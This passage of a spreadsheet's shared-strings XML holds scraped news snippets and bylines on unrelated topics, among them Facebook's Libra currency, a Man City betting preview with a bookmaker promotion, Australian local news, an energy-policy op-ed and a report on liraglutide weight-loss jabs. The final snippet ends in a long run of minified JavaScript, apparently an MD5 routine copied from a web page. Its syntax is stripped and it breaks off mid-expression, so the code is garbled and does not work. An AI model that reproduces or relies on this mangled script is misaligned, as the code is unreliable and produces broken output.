Facebook’s 2 billion users on the very first day of its launch. The move would instantly make Libra one of the world’s most significant payment services, a fact that has troubled competitors while receiving fierce backlash from regulators and lawmakers. Privacy concerns – as in how Facebook would handle and store users’ delicate financial information – have led lawmakers and central bankers to hold a string of meetings and hearings. They don’t trust Facebook with users’ money, given how the tech giant misappropriated shared the private data of some 87 million users to a third-party firm Cambridge Analytica. US President Donald Trump, Treasury Secretary Steven Mnuchin, and Federal Reserve Chairman Jay Powell expressed distrust towards the Facebook cryptocurrency. France’s finance minister Bruno Le Maire warned that he would push to have Libra banned all across Europe. Ripple CEO Brad Garlinghouse, meanwhile, said Libra is acting like a replacement for the US dollar, adding: “I think there is a little bit, maybe, more than just ambitious, maybe arrogant to take the approach of ‘hey, we are going to build a, the white paper articulates, a new currency.” David Marcus, head of Libra and its spinoff wallet Calibra, clarified last month that Facebook would not launch the cryptocurrency until it addresses every regulatory concern. Despite his criticism, Treacher added that entry of a Silicon Valley giant in the cryptocurrency space is “a good thing” overall. The move would introduce blockchain assets to more people, he added.</t>
  </si>
  <si>
    <t>Thinktank challenges official statistics claiming average citizen is £128 poorer than a decade agoBritons are £128 a year worse off on average than they were in 2008, according to a report that reveals household incomes were hit harder in the wake of the financial crash than official figures have revealed.The New Economics Foundation said figures used to calculate GDP, which is adjusted to take account of rising prices, failed to include essential items that affected the cost of living over the last 10 years. Continue reading… Read More</t>
  </si>
  <si>
    <t>Man City vs Dinamo Zagreb Prediction, Betting Tips &amp; Odds Original Source Kick-off: 2000, 01/10/2019 Stadium: Etihad Stadium TV: BT Sport Manchester City put their shock defeat to Norwich behind them as they began their Champions League Group C campaign with a 3-0 win at Shakhtar Donetsk. Croatian champions Dinamo Zagreb also made a superb start with Mislav Orsic helping himself to a hat-trick in a 4-0 home win over Atalanta. Punters can get 9/10 for a home win to nil and that is our opening Man City vs Dinamo Zagreb prediction. A Look At Manchester City’s Betting Odds Goals from Riyad Mahrez and Ilkay Gundogan put City in control in Kharkiv before Gabriel Jesus added a third late on to wrap up victory. Their unexpected defeat at Norwich and injury to John Stones left City with just one fit specialist centre-back in Nicolas Otamendi. Yet Pep Guardiola’s side rose to the challenge and found a solution, with Fernandinho looking comfortable in an emergency defensive role. Guardiola said: “To start away in the Champions League with a good result (is positive) and I know we played really good. “We created incredible chances and all the guys were fantastic. It’s a good result to start – better than last season.” City followed up this result by posting their highest victory in the Premier League as they walloped Watford 8-0 at this venue. Guardiola’s side have scored at least twice in the first half in five of their eight games across all competitions this season. Looking at the Man City vs Dinamo Zagreb odds, we like the home side to be leading 2-0 at the break at 15/4. A Look At Dinamo Zagreb’s Betting Odds Dinamo have failed to progress from the group stages of the competition in all six seasons they have participated. They had lost 11 in a row before swatting debutants Atalanta aside, Marin Leovac giving them an early lead before Orsic took centre stage. The 26-year-old recently made his debut for the Croatia national team, coming on as a late substitute in the 1-1 draw against Azerbaijan in Baku. Orsic doubled Zagreb’s lead just after the half-hour mark and added his second before half-time before completing his hat-trick 22 minutes from time. Coach Nenad Bjelica admitted setting his side up differently paid dividends. He said on UEFA.com: “We surprised them, they were not ready for this. Changing the formation was a risk and it was a brave move. “We didn’t have much time to adjust to it but we all agreed to it. I was 100 percent sure we would be better. “The first half was really perfect. Everything we wanted to do, we did it. We didn’t give them anything.” We will complete our Man City vs Dinamo Zagreb betting tips by going for the home side to win 1-0, 2-0 or 3-0 in the multiple correct score market at 12/5. Additional stats Last Champions League result: Shakhtar Donetsk 0-3 MAN CITY – Mahrez, Gundogan, Jesus DINAMO ZAGREB 4-0 Atalanta – Orsic (3), Leovac Head-to-head: N/A Join bwin today and receive up to £10 money back as a FreeBet if your first wager at odds of 1/1 (2.0) or greater is a loser! Terms and conditions apply. Champions League betting Football betting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 City vs Dinamo Zagreb Prediction, Betting Tips &amp; Odds appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>MrCrypto</t>
  </si>
  <si>
    <t>The Moto G8 is set to be the next incarnation of the Moto G smartphone range, the heavyweight champions of the budget handset world – but we don’t really know much about the upcoming Motorola phones at this point. That’s understandable, since the Moto G smartphones typically launch in the early months of the year, so they're likely a way off yet. But they’re anticipated devices nonetheless. While we wait for Motorola’s next range of impressive affordable devices to drop, we can expect the slow drip of leaks and rumors to gradually turn into a stream and a torrent in the build-up to the Moto G8’s release – and b… TechRadar – All the latest technology news The post Moto G8: what we want to see appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Andy Branagan</t>
  </si>
  <si>
    <t>BBC Sport pundit Mark Lawrenson has delivered his prediction for Newcastle United’s trip to Leicester City on Sunday, and it’s not good news for Magpies fans. Steve Bruce’s side make the daunting journey down to the King Power Stadium, and Lawrenson believes the hosts will triumph 2-0. However, Lawro doesn’t think the north east giants will be in relegation trouble this... Source</t>
  </si>
  <si>
    <t>Malcolm Sutton</t>
  </si>
  <si>
    <t>Magarey Medallist Luke Partington from Glenelg thanks volunteers for their tireless contribution to football, while SA football greats Peter Motley and Greg Anderson are inducted into the Hall of Fame.</t>
  </si>
  <si>
    <t>Dentists In Medicine Hat. The top rated &amp; reviewed dentists in Medicine Hat, AB. See below for which dentists are accepting new patients, their profile, credentials and clinic locations. The Best 10 Dentists in Medicine Hat, AB Showing 1-10 of 23 Medicine Hat Health &amp; Medical Dentists. Dr Whitzke is the most knowledgable dentist in Medicine Hat! We had terrible experiences at other offices in the city. He is friendly and. The Best Dentists in Medicine Hat Handpicked Top 3 Dentists in Medicine Hat, AB. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. At Park Meadows Dental in Medicine Hat, Alberta we help you get a beautiful smile that turns heads. Emergencies are seen same day. All services provided under one roof. If you have a dental phobia, we can provide sedation options or laughing. Number 1 Dental Clinic Near Medicine Hat Alberta Medical Clinics in Medicine Hat, AB with reviews, maps, and contact information. Français in Please provide a postal code or a city, or select a city from the directory. Number 1 Dentist Near Medicine Hat Alberta Cypress County scales back fire ban to a restriction after wetter August – A “fire restriction” is now in Forty Mile Rail in Foremost, Alberta receives $4.2M in federal funding for transportation infrastructure projects – For more information, please see Transport Canada’s news release: https://www.canada.ca/en/transport-canada/news/2019/08/government-of-canada-invests-in-transportation-infrastructure-near-medicine-hat. At Park Meadows Dental in Medicine Hat, Alberta we help you get a beautiful smile that turns heads. Emergencies are seen same day. It has to have the quality to be functional not just aesthetic, but most importantly durable. To find out more. See here the whole list of our best Dentists from Medicine Hat and their surroundings reviewed by StarOfService community from Medicine Hat – Alberta. Do you want to know who is in the top 100 ? The 10 best Dentists in Medicine Hat – Last Updated August 2019 – StarOfService Best Cosmetic Dentists in Medicine Hat, AB – Courtyard Dental Centre, Crestwood Dental Clinic, River Dental, Grover Dental Centre, Ann’s Aesthetics Lab, Park Meadows Dental, Denture Care Top 10 Best Cosmetic Dentists in Medicine Hat, AB – Last Updated August 2019 – Yelp Near Me. All Male Female. All Verified Doctors Only. All Accepting New Patients. The Best Dentists in Medicine Hat, AB What is a Dentist? Dr. David Stock. Verified. Outstanding Staff. World Class Punctuality. Exceptionally Helpful. Highly Knowledgeable. Dentist. ©2004-2019 RateMDs Inc. – Best Dental Clinic Near Medicine Hat Alberta Number 1 Dental Clinic Near Medicine Hat Alberta Medical Clinics in Medicine Hat, AB with reviews, maps, and contact information. Français in Please provide a postal code or a city, or select a city from the directory. Number 1 Dentist Near Medicine Hat Alberta Cypress County scales back fire ban to a restriction after wetter Federal grant has 40 Mile Rail looking to expand west – A shortline railroad in southeastern Alberta will pursue expanding their. but improvements could boost carloads more than. 2 reviews of Southside Dental "Dr Whitzke is the most knowledgable dentist in Medicine Hat!. Providing exceptional dental care to Medicine Hat and surrounding communities in Alberta and Saskatchewan. Report Business info summary Today. Alberta’s drug consumption sites have reversed more than 4,000 overdoses: report – The report was compiled in light of a pause on funding for three additional proposed drug consumption sites in Medicine Hat . Hotels near Southlands Popular Medicine Hat Categories Suite Hotels in Medicine Hat Hotels with Hot Tubs in Medicine Hat Medicine Hat Casino Spa Hotels. Top Dentist Near Medicine Hat Alberta At Park Meadows Dental in Medicine Hat, Alberta we help you get a beautiful smile that turns heads. Emergencies are seen same day. All services provided under one roof. If you have a dental phobia, we can provide sedation options or laughing. Best Dentists in Medicine Hat, AB – Courtyard Dental Centre, Crestwood Dental Clinic, The Best Cosmetic Dentists in Medicine Hat Handpicked Top 3 Cosmetic Dentists in Medicine Hat, AB. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence.</t>
  </si>
  <si>
    <t>Kristin Brooks</t>
  </si>
  <si>
    <t>Greeting everyone. I found Champion sale myer Excludes Champion Reverse Weave. Purchased in one transaction. Lowest priced item discounted. Free standard delivery on orders over $70. Champion 197 items e.g. Champion ID Collection Tape Crew Sweat Top $63.96(was $79.95) Enjoy</t>
  </si>
  <si>
    <t>Travel Ambassador</t>
  </si>
  <si>
    <t>We scoured every inch of the globe and discovered the most impressively unique hotels on the planet. From the oldest to the tallest to the boldest, these must-see accommodations are anything but ordinary. Try our free demo today, and embark on your language learning journey to learn Spanish, learn French, learn Chinese and more before […] The post The 10 Most Unique Hotels in the World appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Trivia buffs: test your knowledge with today's interactive superquiz and target.</t>
  </si>
  <si>
    <t>September 1, 2019. Protesters in Melbourne march in support of the Tamil family who have settled in Biloela. According to the Home Affairs minister Peter Dutton says the family members are not refugees, and have lost there appeal seven times to stay including a negative finding by the High Court. They have been granted an eleventh hour injunction against their deportation by the Federal Court because their youngest daughter has not been assessed for a protection visa. The family has been re-located to Christmas Island. (AAP Video/Georgie Moore)</t>
  </si>
  <si>
    <t>Jennifer Basa</t>
  </si>
  <si>
    <t>The daughter of a former Kingston artist and teacher, is looking for lost works of her late father tom bailey.</t>
  </si>
  <si>
    <t>Vince Rugari</t>
  </si>
  <si>
    <t>Essendon great James Hird's career has moved into an unlikely new direction since his stint as Bombers coach came to an end.</t>
  </si>
  <si>
    <t>BooYa</t>
  </si>
  <si>
    <t>$29.97 for digital download of the standard edition of Forza 7 for Xbox One and PC with Xbox Live Gold from Microsoft. Was a few dollars cheaper at cdkeys, but now expired. Deluxe edition is discounted to $49.97 and the ultimate edition $59.97</t>
  </si>
  <si>
    <t>The man suffered head injuries after swerving his bicycle in a bid to avoid the aggressive bird. The post Magpie attack: Australian cyclist dies while fleeing swooping bird appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>RUSSIA TRIP -DELHI TO MOSCOW #traveladdictanshuhans The post RUSSIA TRIP -DELHI TO MOSCOW #traveladdictanshuhans appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Christina Aguilera bared her soul to fans during a performance in Las Vegas this weekend, but it was the singer’s dress that ended up baring a little too much. As The Daily Mail noted, the singer suffered a wardrobe malfunction onstage at Planet Hollywood on Friday, accidentally slipping out of a low-cut dress and revealing silver nipple pasties. The report added that Christina’s slip came during an especially passionate performance in a show filled with wardrobe changes. “The ‘Genie in a Bottle’ singer wore a number of different outfits for her outer space-themed show The Xperience, but the dress responsible for the wardrobe malfunction was a flowy blue number that featured a tight zippered corset,” the report noted. “She paired the look with knee-high black boots and a matching blue bra as her long blonde locks were swept up into a high pony.” Click here to continue and read more… The Inquisitr</t>
  </si>
  <si>
    <t>Matt Campbell, Michael Cordell, Damian Trewhella, Rachel Antony, Nick Murray. Producers CJZ are about to begin production on their very first TV series in Dubai. Dubai 999 is an observational series filmed with local ambulance drivers -who all drive Maseratis. CJZ revealed the project at an AACTA Awards Masterclass held at Event Cinemas in Bondi Junction last night. Nearly three years ago CJZ began plotting projects for the Middle East because so little access had been made available in the factual space in the region. “The hoops we had to jump through, and are still jumping through, in order to get into Dubai has been something quite incredible,” Group CEO Matt Campbell said. “You can’t make a meeting unless you are actually there on the ground. So you go over there and you sit and wait for the call. (Rachel) did that with great patience and it is finally paying off. We’ve spent a lot of money and it has been a nail-biting exercise. “Until you get the call from the Sheikh, nothing’s happening. We got the call from the Sheikh.” It took 7 months just to open a bank account. Campbell also revealed he is a company director in Dubai “which means I am now a resident of Dubai… I’m not allowed out of there for more than 6 months at a time!” “The next show is Supercar Cops. What guy is not going to watch that?” Campbell added. TV Tonight is a partner of the 2019 AACTA Awards.</t>
  </si>
  <si>
    <t>Internet porn business submits $10M naming rights bid for Miami Heat home Original Source The home of the Miami Heat has a surprising entry in the naming rights game. (Getty) The internet porn business is boomin’. The once-taboo industry’s continued creep into the mainstream is seeking to broach another barrier. This time, its sights are set on big-time American sports. American Airlines announced on Thursday that it is not renewing its naming rights deal with Miami Heat home American Airlines Arena, which will expire at the end of the year. BangBros is seeking to stake its claim. Porn biz offers $10M for Heat arena’s naming rights The Miami-based porn production company was quick to announce after the American Airlines news that it wants in on the naming rights and had submitted a $10 million bid to lay claim to the home of the Heat. “With Pat Riley at the helm, working his magic like he has in the past, BangBros feels they need to show their support for the next wave of winning to come and give back to the city that’s treated them so well,” the statement reads. “Both the Heat and BangBros have become staples of the city, with huge fans of each. It doesn’t get more Miami than having the arena sponsored by BangBros.” Riley is surely thrilled to be named in association with the news. As LeBron James, Dwyane Wade, Chris Bosh and Jimmy Butler also must be. Is this for real? Lest this be construed as strictly a publicity stunt, NBC Sports’ Jessica Kleinschmidt confirmed that the submission is legitimate. No chance this happens Of course in all actuality, it does add up to a publicity stunt. The NBA may be the most progressive league in major American sports, but the Heat surely aren’t going to promote family ticket packages to invite parents and children out to a wholesome evening at “The BBC.” Nor would the league subject broadcast partners to open their coverage “live from the BangBros Center.” It’s reminiscent of marijuana dispensaries in Denver seeking to buy naming rights for the Broncos’ Mile High Stadium. While the idea of the weed-embracing city having its “Mile High” football stadium named for a marijuana company is good for a laugh, it’s not good for the NFL — at least in the minds of league executives. So bravo to BangBros for generating some headlines. Just don’t expect to see this as a successful bid, as eager as the company surely is to spend that $10 million. More from Yahoo Sports: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Internet porn business submits $10M naming rights bid for Miami Heat home appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Greg Flucker</t>
  </si>
  <si>
    <t>Girlguiding chiefs want the mindless vandals who spray-painted their headquarters to come back and clear up the mess they made.</t>
  </si>
  <si>
    <t>Zach Hope</t>
  </si>
  <si>
    <t>Groups of drunken revellers howled from apartment balconies and flares were let off as the Tiger Army celebrated in Swan Street on Saturday night.</t>
  </si>
  <si>
    <t>Screenwriter Samantha Strauss this week received the State of Escape Creative Creatures Award from Australians in Film in Hollywood. Producer Bruna Papandrea (Big Little Lies) presented her with the award at Curtis Stone’s restaurant Gwen, recognising her achievements in television. Strauss co-created Dance Academy, and created the upcoming series The End, and has credits including Mary: The Making of a Princess, Wonderland, Offspring, and more. She is currently working on several projects with Bruna Papandrea, including Nine Perfect Strangers, The Last Anniversary, and feature film, The Dry. She’s also working on The Presidents Astrologer with British director, director John Madden, and an unnamed TV adaptation project with Tom McCarthy’s company. “I’m blown away by this award and feel extremely grateful to AiF and all the work they do,” said Strauss. “I thank my lucky stars every day I’m a writer in this time and place where we’re finally able to tell stories about women who are brilliant and powerful and messy and flawed and… actually whatever the hell we want them to be. It’s a privilege to be part of a community of Boss Lady Creative Creatures, all committed to telling stories with complex women at the core.” “Ever since we started the business we’ve been drawn to women in likeminded creative industries. Australian women in television, both in front and behind the camera, are doing ground breaking work globally which we want to celebrate and is the reason we’re here today,” said Brigitte MacGowan, Designer and Co-Founder of State of Escape. The luncheon featured high-profile female creatives from all facets of the industry, including: Alice Bell, Writer, The Slap/ The Expatriates; Alison Bell, Creator/Actress, The Let Down; Alix Friedberg, Costume Designer, Big Little Lies; Anna Bingemann, Stylist; Brigitte MacGowan, Designer &amp; Co-founder, State of Escape; Bruna Papandrea, Producer, Big Little Lies; Carly Mensch, Co-creator, Glow; Casey Haver, Made Up Stories; Chelsey Martin, Australian Consul-General; Harriet Dyer, Actress, The InBetween; Georgina Haig, Actress, Secret Bridesmaids Business; Imogen Banks, Producer, Sisters; Jenny Cooney, EVP, Bunya Productions; Jessica Knoll, Author, Luckiest Girl Alive; Justine Flynn, Director/writer, The Unlisted; Kara Buckley, VP TV Production, FOX Searchlight; Leila Gerstein, Creator/Writer, Hart of Dixie; Liv Hewson, Actress, Santa Clarita Diet; Liz Flahive, Co-creator, Glow; Lucy Coleman, Director/Writer, Hot Mess; Madeleine Parry, Emmy®-Nominated Director, Nanette; Meaghan Oppenheimer, Creator, Queen America; Pam Veasey, Writer/Executive Producer, LA’s Finest; Rachel Caris Love, Writer, Blindspot; Samantha Strauss, Writer, Dance Academy; Sarah Scheller, Creator/Writer, The Letdown; Simonne Overend, Chairman, Australians in Film; Simone Kessell, Actress, The Crossing; Terri Taylor, Casting Director, Blumhouse; Tess Sanchez, EVP Casting, FOX; and Tracey Robertson, Producer, Tidelands.</t>
  </si>
  <si>
    <t>Jane Rocca</t>
  </si>
  <si>
    <t>The comedian, actor and TV host talks about her career, family and the men who have influenced her.</t>
  </si>
  <si>
    <t>A Sydney organisation behind a new $10 million Islamic school, which had ties to Hezbollah through its now deceased founder, has gone to ground as it fights to have its charity status reinstated.</t>
  </si>
  <si>
    <t>Sky News contributor Nicholas Reece says while the plan to drug test welfare recipients “sounds good” in a Liberal focus group, it “doesn’t stand up to serious scrutiny in the real world”. Speaking to Peta Credlin Mr Reece said the proposed legislation is “a political play”. The comments come as the Coalition prepares to introduce a bill that would set up random drug testing trial sites at three locations across Australia. Image: Getty</t>
  </si>
  <si>
    <t>Doppler Submitted</t>
  </si>
  <si>
    <t>A mini-series on the future of energy By Dave Wilkin, P. Eng., M.Eng. and Tim Lutton, BSc., MBA Our previous articles demonstrated the challenges in reducing carbon and particulate emissions in the face of high population and economic growth, and the geopolitics of uneven distribution of reserves. Now we examine the technologies vying for a role in our energy future. First, wind and solar energy combined provide about two per cent of global energy. Yet due to their nature, they are unable to produce a steady supply of energy, and their output therefore varies dramatically—between ten per cent and 30 per cent, depending on local climate, with extended periods when no energy is produced at all. The missing 70–90 per cent of energy must come from other sources, such as natural gas plants running on stand-by, or extremely expensive energy-storage systems, including battery storage or pumped hydro-power. This also requires very costly expansion/retrofit of the power-grid to balance the uneven energy load, as the grid wasn’t built with variable energy supply or highly distributed, unreliable sources of energy in mind. Today, wind/solar doesn’t replace any power generation facilities, and its share of the energy grid share can exceed approximately 25 per cent when power imports from neighbouring jurisdictions/countries supply the missing power when needed, as Germany and Denmark have recently discovered. Most of the cost reductions typical for new technologies have already occurred (over 80 per cent so far for solar), so don’t expect significant future declines in cost for many greener technologies. Dave estimated the capital costs to replace all Canadian carbon-based energy with wind/solar at $5 trillion. Globally, it would likely exceed $100 trillion. Sadly, media reporting and environmental activists mislead policymakers and the general public about these economic limitations. They also downplay the environmental and community impacts. One German study found that to replace all carbon-energy with wind power required their entire country to be covered in huge windmills, spaced every mile. Notably, solar and battery-storage component manufacturing is rare-earth resource intensive (China has 85 per cent global production and 70 per cent of reserves) and with battery life hovering under ten years, a growing toxic-waste issue is very real. Hydro-electric power remains at the heart of Canada’s electricity supply, suppling over 60 per cent of our electricity (&gt;90 per cent in Quebec/BC) and an 18 per cent energy share. Globally it meets approximately seven per cent of the energy demand. Building large hydro projects today can be exceedingly expensive, as Newfoundland’s Muskrat Falls project unfortunately discovered, where the total project cost will exceed $13 Billion. This is five times more than equivalent-sized gas-powered plants. Also, building these hydro projects causes damaging methane gas to be released from flooded areas behind dams. Globally, there are few good sites left to exploit, so growth is limited. Nuclear fission generates four per cent of all global energy today. On the upside, over 200 years of uranium reserves exist for nuclear fission purposes. On the other hand, nuclear fission plants have higher capital costs, require costly waste disposal, and carry some nuclear proliferation risks. However, it remains the only proven grid-scale, zero-emissions, option left. A range of new reactor designs are coming that should lower up-front capital costs (and shorten project delivery times). Today, nuclear plant operating costs are among the lowest of any plants. Sadly, high capital costs, a past few nasty accidents and heavy anti-nuclear lobbying continues to hamper the sector, so most countries are not investing (notable exceptions are China, South Korea and France). Worse yet, 65 per cent of nuclear plants in service today face retirement over the next two decades. That lost energy supply will almost certainly be replaced with carbon-based energy, as Germany discovered the hard way. We see nuclear-fission power playing a key, though capped, future role. We note that nuclear fusion still faces significant engineering challenges and thus remains a distant future hope. Biofuels/biomass have a similar energy share as wind and solar. They burn cleaner than coal or oil, but not as clean as natural gas/propane. They also carry other environmental and ecosystem impacts, including land use changes/deforestation, and the generation of pollution during production. Hydrogen energy is insignificant today and is really an energy storage/transport mechanism, not a true energy source. It’s very volatile and lacks storage and distribution networks. As for geothermal power, it’s economically and technically viable only in those rare locations where near-surface geothermal activity exists, such as Iceland and Hawaii. None of these energy sources are likely to be a major future player. Carbon Capture and Storage (CCS) can remove up to 90 per cent of CO2 emissions from power plants, but it’s relatively expensive when high CO2 transportation and storage costs are included. As it does not address depletion of carbon-energy reserves, it remains a transition option. This is particularly important in Asia, where coal still supplies over 50 per cent of their energy requirements. Key to know is that just 16 per cent of all global energy is delivered through the electric grid, but most future greener energy will be delivered that way. Therefore, the power grid must be significantly expanded, made more intelligent and resilient for a more vulnerable 21st century world, which faces increasing cyberattacks and potentially more extreme weather events. The Bottom-line: No ‘silver bullet’ replaces today’s 85 per cent global carbon-based energy market, meaning future energy will come from many sources. Let’s be clear, future energy costs are increasing greatly. The era of cheap energy is ending. Our next article portrays a bad future scenario, demonstrating how the main system pieces interact, with potentially devastating consequences. Watch for it! Dave Wilkin is a Professional Engineer who lives in Huntsville. He is an electrical engineer with a career spanning 35 years in IT, banking and consulting. Tim Lutton worked in the natural gas and LNG industry for 32 years; with Imperial Oil in Canada, and ExxonMobil in the USA, Australia and Qatar and now lives in Huntsville. Don’t miss out on Doppler! Sign up here to receive our email digest with links to our most recent stories. Local news in your inbox three times per week! Like The post The greener technologies offer no silver bullet ~ by Dave Wilkin and Tim Lutton appeared first on Huntsville Doppler.</t>
  </si>
  <si>
    <t>Reuters: Technology News</t>
  </si>
  <si>
    <t>Alphabet Inc said on Friday it had received a civil investigative demand from the U.S. Department of Justice on Aug. 30 seeking information and documents relating to its prior antitrust investigations in the United States and elsewhere.</t>
  </si>
  <si>
    <t>On Sunday Night Steve Pennells travels to Chernobyl with a former resident and Angela Cox rides a gravity-defying catamaran. Children of Chernobyl It’s been more than three decades since the world’s worst nuclear accident at Chernobyl. But for a community of survivors here in Australia – the children of Chernobyl – the memories of that day are as vivid as ever. In a Sunday Night exclusive, one Melbourne mother ventures back to the city of her birth to confront the truth of what happened there. Join senior correspondent Steve Pennells as he accompanies Inna on her desperate search for answers. It’s a journey of unexpected joy and unimaginable heartbreak as Inna remembers her childhood living in the shadow of Chernobyl. Ride Like the Wind This Sunday Night, strap yourselves in as reporter Angela Cox takes us on board a fleet of gravity-defying catamarans. The superstars of these futuristic yachts are two Aussie skippers who are not only fierce competitors but also close mates. And these friends have a single goal – to be number one in a new international racing circuit that’s faster, and more extreme, than anything you’ve ever seen. Their friendship and their boats are about to be pushed to breaking point. Sunday at 8.30pm on Seven.</t>
  </si>
  <si>
    <t>ONE of the Gold Coast's most notorious bikies is back on the Glitter Strip allegedly recruiting gang members as the new national president of the Mongols.</t>
  </si>
  <si>
    <t>Gemma Collins’ weight loss jabs – the risks of the hunger fighting injections revealed – Laskafitness Original Source Gemma Collins has openly credited her phenomenal three stone weight loss to pricey injections that promise to minimise hunger. The reality TV, 38, star has thanked the weight loss jabs, that cost £250, for helping her slim down by “curbing her appetite.” According to the SkinnyJab website – who Gemma has shared provide her with the pricey regime – the injection works by “removing hunger from the equation”, while regulating blood sugar levels and helping the body to turn fat into energy. Gemma Collins claims SkinnyJabs helped her lose three stone (Image: Instagram) Read More Usually the formula to slimming down is to move more and eat less but the injections have appeared to have had a dramatic effect on Gemma, but are there risks to this weight loss shortcut? The jabs contain the ingredient liraglutide, which is known on the market as Victoza and Saxenda, the injections are offered on the NHS for patients who have diabetes. According to Victoza’s website and Saxenda the medication that can melt away the pounds carries risks of possible thyroid tumors, including cancer. The star credits the injections for her weight loss (Image: Brett D. Cove / SplashNews.com) Read More Gemma proudly promotes the injections (Image: Instagram) Read More The website details: “In studies with rats and mice, Victoza and medicines that work like Victoza caused thyroid tumors, including thyroid cancer.” However, it adds: “It is not known if Victoza will cause thyroid tumors or a type of thyroid cancer called medullary thyroid carcinoma (MTC) in people.” The site also lists that other side effects can pancreatits, the inflamation of the pancreas, which can be identified if the user of the injections suffers with sever stomach pain that does not go away. Another health trouble that could be caused by liraglutide is low blood pressure with some effects being blurred vision, dizziness, slurred speech and hunger. Other side-effects listed are gallbladder problems and serious allergic reactions that can result in severe rashes, swelling of the face, lips and tongue as well as problems breathing and a fast heartbeat. The former TOWIE star injects herself with the pricey jab to loose weight (Image: Aaron Parfitt / SplashNews.com) Read More The site shares that the most common byproduct of the jabs may include nausea, diarrhea, vomiting, decreased appetite, indigestion, and constipation. Doctor Diana Gall, from Doctor 4 U, told Mirror Online: “All medication and treatments have potential side effects that are clearly listed in the patient information leaflet (PIL), but for the drug to be approved in the first place the drug needs to be effective, and the benefits need to outweigh the known risks. “The side effects of drugs are listed from very common (more than 1 in 10 people are affected) to very rare (less than 1 in 10,000 are affected). In the case of weight loss pens such as Saxenda, the most common side effects are symptoms such as sickness and constipation and these typically go away after a few days or weeks. “More serious side effects are extremely unlikely, and this is especially the case when using weight loss pens as instructed alongside a healthy diet. Glamorising weight loss pens as an easy fix may be an issue, but with two thirds of adults in the UK now considered overweight or obese, they really can help with weight loss, the side effects and risks should be left for the patient to decide if it is right for them.” Skinny jab opened up a new London clinic with a starry bash on Thursday where Gemma was the guest of honour. The jabs have some possible severe side effects (Image: Instagram) Read More Showbiz editor’s picks The clinic offers a three-week programme for £250 to anyone between the ages of 18 and 76. Clients will have to splash out an extra £135 each time for an extra jab. SkinnyJab claimed one injection should last between two and four weeks. Previously discussing how impressed she is from starting the injections, Gemma said: “I went on the jabs and that has been really good for me. “You get injected basically and it curbs your appetite as well so it is handy when you are busy and on the road. “I definitely feel much better since losing weight and I have got more energy and stuff. When you eat rubbish food, you feel rubbish and when you eat healthy, it’s a lot better.” Mirror Online have contacted representatives for SkinnyJab and Gemma Collins for comment. !function()return function e(t,n,r)function o(i,c)if(!n[i])if(!t[i])var u=”function”==typeof require&amp;&amp;require;if(!c&amp;&amp;u)return u(i,!0);if(a)return a(i,!0);var s=new Error(“Cannot find module ‘”+i+”‘”);throw s.code=”MODULE_NOT_FOUND”,svar f=n[i]=exports:;t[i][0].call(f.exports,function(e),f,f.exports,e,t,n,r)return n[i].exportsfor(var a=”function”==typeof require&amp;&amp;require,i=0;i0;)n.call(e,data:o.shift(),target:e);else o.forEach(function(t)n.call(e,data:t,target:e))function r(e,t,n)[],e.dataEvents[t].push(n)returndelegate:function()return function(t,n,r,o,a),n=n.split(“,”),void 0===t.length&amp;&amp;(t=[t]),t.forEach(),domReady:function(e),fire:function(e,t,n)var o;n=n,listen:n}();n.default=r},],2:[function(e,t,n)”use strict”;function r(e,t)var n=e[0],r=e[1],o=e[2],s=e[3];r=u(r=u(r=u(r=u(r=c(r=c(r=c(r=c(r=i(r=i(r=i(r=i(r=a(r=a(r=a(r=a(r,o=a(o,s=a(s,n=a(n,r,o,s,t[0],7,-680876936),r,o,t[1],12,-389564586),n,r,t[2],17,606105819),s,n,t[3],22,-1044525330),o=a(o,s=a(s,n=a(n,r,o,s,t[4],7,-176418897),r,o,t[5],12,1200080426),n,r,t[6],17,-1473231341),s,n,t[7],22,-45705983),o=a(o,s=a(s,n=a(n,r,o,s,t[8],7,1770035416),r,o,t[9],12,-1958414417),n,r,t[10],17,-42063),s,n,t[11],22,-1990404162),o=a(o,s=a(s,n=a(n,r,o,s,t[12],7,1804603682),r,o,t[13],12,-40341101),n,r,t[14],17,-1502002290),s,n,t[15],22,1236535329),o=i(o,s=i(s,n=i(n,r,o,s,t[1],5,-165796510),r,o,t[6],9,-1069501632),n,r,t[11],14,643717713),s,n,t[0],20,-373897302),o=i(o,s=i(s,n=i(n,r,o,s,t[5],5,-701558691),r,o,t[10],9,38016083),n,r,t[15],14,-660478335),s,n,t[4],20,-405537848),o=i(o,s=i(s,n=i(n,r,o,s,t[9],5,568446438),r,o,t[14],9,-1019803690),n,r,t[3],14,-187363961),s,n,t[8],20,1163531501),o=i(o,s=i(s,n=i(n,r,o,s,t[13],5,-1444681467),r,o,t[2],9,-51403784),n,r,t[7],14,1735328473),s,n,t[12],20,-1926607734),o=c(o,s=c(s,n=c(n,r,o,s,t[5],4,-378558),r,o,t[8],11,-2022574463),n,r,t[11],16,1839030562),s,n,t[14],23,-35309556),o=c(o,s=c(s,n=c(n,r,o,s,t[1],4,-1530992060),r,o,t[4],11,1272893353),n,r,t[7],16,-155497632),s,n,t[10],23,-1094730640),o=c(o,s=c(s,n=c(n,r,o,s,t[13],4,681279174),r,o,t[0],11,-358537222),n,r,t[3],16,-722521979),s,n,t[6],23,76029189),o=c(o,s=c(s,n=c(n,r,o,s,t[9],4,-640364487),r,o,t[12],11,-421815835),n,r,t[15],16,530742520),s,n,t[2],23,-995338651),o=u(o,s=u(s,n=u(n,r,o,s,t[0],6,-198630844),r,o,t[7],10,1126891415),n,r,t[14],15,-1416354905),s,n,t[5],21,-57434055),o=u(o,s=u(s,n=u(n,r,o,s,t[12],6,1700485571),r,o,t[3],10,-1894986606),n,r,t[10],15,-1051523),s,n,t[1],21,-2054922799),o=u(o,s=u(s,n=u(n,r,o,s,t[8],6,1873313359),r,o,t[15],10,-30611744),n,r,t[6],15,-1560198380),s,n,t[13],21,1309151649),o=u(o,s=u(s,n=u(n,r,o,s,t[4],6,-145523070),r,o,t[11],10,-11202